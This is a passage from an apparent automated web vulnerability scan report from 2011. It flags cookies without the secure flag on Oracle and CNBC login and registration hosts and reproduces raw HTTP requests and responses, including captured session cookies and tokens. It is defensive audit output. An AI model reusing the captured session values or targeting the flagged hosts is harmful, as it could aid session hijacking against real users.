Ad8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:18 GMT
Accept-Ranges: bytes
Content-Length: 1005
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCSO6uHK6EVADUS1EHWFB01t_dD
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

7.33. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-r-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 1021
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCXC6uHK6EVADUS1EHWFB01t_dP
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

7.34. https://login.oracle.com/oam/server/sso/auth_cred_submit

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

OAM_REQ
BIGipServerloginadc_oracle_com_http

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /oam/server/sso/auth_cred_submit HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
Content-Length: 2316
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNt
Gu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

v=v1.4&request_id=-1117423317593169810&OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQ
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:28 GMT
Set-Cookie: OAM_REQ=VERSION_4~8sDFSRHdibovgCmaA9kyeOsOvdSrurh9%2fYsDnUk2jlujlceQtRW%2fQNi%2flXtkj%2f1SgeTckB5GdKb4Hiz%2bcaNwewyERD7QcMRgfrRpVp90TY8%2bnYtDCyQML4cbcIJSBTocN%2bEcyowHjAV4T8IiI3ws7mDtrHQycjFS%2b95QII460g3qoNhW5NtfCCWtvEZPMmVBwHPgvUl5YR43OwJgq%2bgde0LQEam8lbD94jp4S6QIQXKKWPHI0shq11UCzQp5aTviul4GjqyWIuFn07nRX3c7G%2b8HAXNSYggrFqjg7N9UUmqwIfpGSKgxVQm2tlsyhx2lF5%2fX0znmI0CGPxx4YQVTl%2bytRrRVXkWsJKWAVC2FzkHt20rPSUn7Rzo%2bMTr39tUdbEwX6W8hNO2IrkJvXMMcG4bTMjA%2flK%2f4eDDKQ%2br%2f1adGjvQ2WW%2bXBGu1QE7ISAHAcp%2bIbTzC3qDrRlaOZfhk97Y08zoNSgWTBsG12KJsu03sFdYO857KTadQANWaeWqdu2Q2BUUGt%2fbNAg%2fENILYpeVU4d86XheiVhTMYekWWDmFlAWs0DYAM%2fCQK2ZXKVW7YTNKyMvHX1HQ2l4F5f%2bD6JGo%2f4Ry2rQnRq7GyVJ%2bzJQtF6jmJoT%2bzGRiv%2fNNNbbC31fjTRiLatV9yBVhBxppHWhW6bCA6QYsp5V74BcWmdtWQhbfiEnKZ3UmOb%2fCy1sG%2frCk%2fnPRs3cvRcBogNG7wow5PNoRfPVOUWXc7usXNYWVgHDEX%2fHWsui%2f4QTdBvYq%2ft2HetL6iIJD9WZ8jNh%2blmJa3smPgzYT9gacAilyIHHONowOlZ%2bcURiBuvAb7MvZxw9FgzeFFRCTo6x2xnhWElY4HbK7QFkICQ30JqYfGsrCQ8MDGbZGiAbZ46PvOXPiieaTuZc5UIc1bCKdSV1jOhoXiKS%2bwpAoSfC%2fe85ishtCItS6D9QwAU%2b6loe3DgvK4n71PHvaEEvoDHmJRu7cBud9m6v1ZVrhfxyTRXFlYRFNNuqkYAUxr7%2btX%2beHeWSxzLnrsRku1QxjbO9KosKHSaLFViJbMvbUqdCJO47kYlWlO1yUUjPaovy7hybBAbZv2lIBBYVBFi9AkrWVySFrl%2blnuYi%2f7VefR27D8%2fNlHuzS3d0uQp54NDsb3w0CM2d0ZEgF261aZjlrZDv7QPzW5%2fjv47uJUdUyzIIsrD%2fpO4WqefIJZkNbDUIiN4%2fU3MdciWfJk9ZyPeIuj4Z4SIQnGof8Zqf5FpE7YLidXdna2kuPrj9%2bWvOIEl0O6xE87fUHG83cMhqWltQTxdLcr7vm0KmM5n%2bc76Z0YYdmjqH48rlxK5HgZx%2bcLO0qjpOhfgGYsm%2blpKve%2bwUGhiGwuhvSfrI1RCpOeYzZT4Ow%2b7u5rIP2Z9n8CFs7YylZLN1thygm8RmyQw5PuTblocl9AFFvgH3MExec2L3WC0ymRApmsstEbF2Y%2bmnBtTbxMot3ZXMcfN9Aruj3T%2b%2b7D8u2Zv%2ffBdVt5qG3QItonF3FaFRiJ9QfIkvCT2vlYPQbI8jrJ5lqWqqYuyTS6DQdIJsSun1bXFZwksK9WdxHJGkOzAs3tM46h%2bhk9GQBqLceWigyZCuwHPI%2bHUUAq3a3j3jKLvi6eS5ZWrCxGXLqnsFSGQUWP7fElxGN35xwbvqMqetKjqX5VPTvDM4DINi0R1eoL5Xy8JofGj%2f1iEBuChkCDaSwb6sU%2b3ozVy4teWDpKd2ingo72r3r%2fM0rCvbbRfGlsN91sA%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXg116uHK6EVADUS1EHWFB01taYd
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:16:28 GMT; path=/
Content-Length: 2359

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

7.35. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

OAM_REQ

BIGipServerloginadc_oracle_com_http

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:13 GMT
Set-Cookie: OAM_REQ=VERSION_4~1UuUhb3VlJjpjbcfM%2bCo%2b%2bMiWJ2ThT1j0zV2GIRgsiVXHKq1wWviikzjAmSMNpHcxw1rhPxnndOe6siHyjxtbEM%2buYuUn%2bUvYKd01%2bdN5qmbCefoBjLXOdBrDbalBGhTFH1mcenZ6VQcZOtiYN8%2b2RhWlQVpI0kTgRyqGG40EECD4CxAU4gDEYcZmI2B3wNkljoMdwVuaGWnut3Ws3E5AmamcNRVrdECimq1Mq%2f26%2bWfrUnoqmsx7kxOsJNewr%2bnbiYvS6wDHfxOtJWhU9pUItq8bUkoQwr7H5isBCh5meyvKe8ms68i55w4CahCTz3p6A01AM2dYBzGmRORCv6MqWPBKK5rVQPutfIo4HtNsfY2j5bm56F%2fzt94BzXXWxxsIhITfd%2b5we89fEJFZ2CTJgrZuXFNGB8jvQYx1YE6%2b7ASPoQu6ptzJ7jgdMAcNsxu50KMjCTA9dS18y7RfMmioWGVZaXuiTS26UzYRBWtMqgP6BhdQZSlRcjTcuc46NN8nrnPWOZL4K3h0yZI3vi8mV4sFUAHB2aS%2fObCAYn0yTQ3hhne5ezNrHo%2bH9c64NxLbPfw7eZU0b%2b4HhsFiPrF8I3JW0kUOq2JgvMJfMrL2huNN1Zpg%2bCEZraUo1TgPJ0143QFgYSJe1eczDw2MyCnfK3oh6Qtd7KYCYZqmx2UGJZqdGMHwEYjBtChCnZ%2bAYXC52A7T7BfE9%2bsU5UIViqxLMgLQufDXehYMfsh5xmRetJCVQjKlYhNt7oMAXSuo9O2k7OMGli%2fN4scZh0Pzed3GEjYCczp0U22FIrQ0m%2f%2bmzDHuyeEtas2vlW6JqELbY%2fxow1EezrQ%2bGYJaUxmUmB0yGsjb2F1Rp7CJPqKBgfXUpG7wnI326ZeV6pmgG9tMIY562dx0jU2RAMPJ1RgtCLRBoiQfe5PC4CVl2COVV%2fQGPEJ08Ey9H8gUzMJnEcE45wTXctneFvp7B%2bb%2fqrgJErqrGicSt5dbvcFIsmoCMx7XapdWZKlBi1mu98HJYyULu6G89uz7J7F1OUfVHXvohzzOrSr%2becHY4ndhIRFBwY5sSgv%2bNzfUhO9kDgCTx%2bkyBXZS4ENTxntnbFbXdYwDRUy3ced%2bRD1gv6b5Z1m46L2ASxzktwc8%2ft6h2e%2fZddmlbvJWSuAKXOVJnZPHeqq52brL9R2gKGGj8BrRjerqgBbjDog3QbuqH%2fVAGSNF0SzQwxZUJ6%2bWrNxH4KdRN3jYQrSX8x8LET%2fNACGe9jkZHVZWQKO6%2bAYVadrfVlSSL%2fxDUaDg6rdboxh8xYhMFUB1iAtoS0tCXjvv8L7w3iNda8ERdiiOKy%2bzqxzLqwOti%2bDPDfBmzK%2fPqcoG4eKrU2QS0uiJhNKc1LBvRBAcEjEA6JPJyO7fKHt9Cm61%2bSMW0H4YGmgW1TDtuQ81K00oZc%2bvp8PB%2f5uw3pu3y%2bMHs5TOOFMQv3Ndu%2b6mY%2bqO4nzv3w6U6u8b08hyFm08mgiATuuPlAlRk03u%2bjPRx2hAvWC8poLvKtS0wKaWl8DTa79BTB7DLE8gKChrkaHA2PeautfHjr5C7tfyfsR4L%2fPbtHU2Ei28ge9mNEOIcqrE5h53SVtUecGk51ABEcw%2bu%2f5cvPKa%2frIBDaoUQChQjGIrYSm1J8qODITQ2AJoAe%2fULjYYDVDNM9Mso54mrVWl%2fTy3IZhZNmrS0J5kUhi9G7LHhiUKSx7Y%2fC%2bSPs%2fgVaAtG2nE93v6Y%2b3XHD8w%2fvIU6%2fjajSgqSI5oTv%2bgjlFIUeIzqAc%2fJkSJ%2b8Im1uaWQrVWrz8LjrbXglHGh4%2fdkgqoMYyj85f5xa%2f0NxgBcbU%2bceGpsINAzmIfwo%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXBDg6uHK6EVADUS1EHWFB01t_b1
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/
Content-Length: 3286

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

7.36. https://register.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 13 Aug 2009 22:54:28 GMT
ETag: "3b-4710dd15eb100"
Accept-Ranges: bytes
Content-Length: 59
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/

<script>
window.location="http://www.cnbc.com";
</script>

7.37. https://register.cnbc.com/RandomImage.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /RandomImage.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RandomImage.jsp HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/
Content-Length: 2261

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......2...."..............................
...[SNIP]...

7.38. https://register.cnbc.com/cas

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /cas

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cas HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:44 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 201
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /cas was not found on this server.</p>
</body></html>
...[SNIP]...

7.39. https://register.cnbc.com/checkemail.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /checkemail.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkemail.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
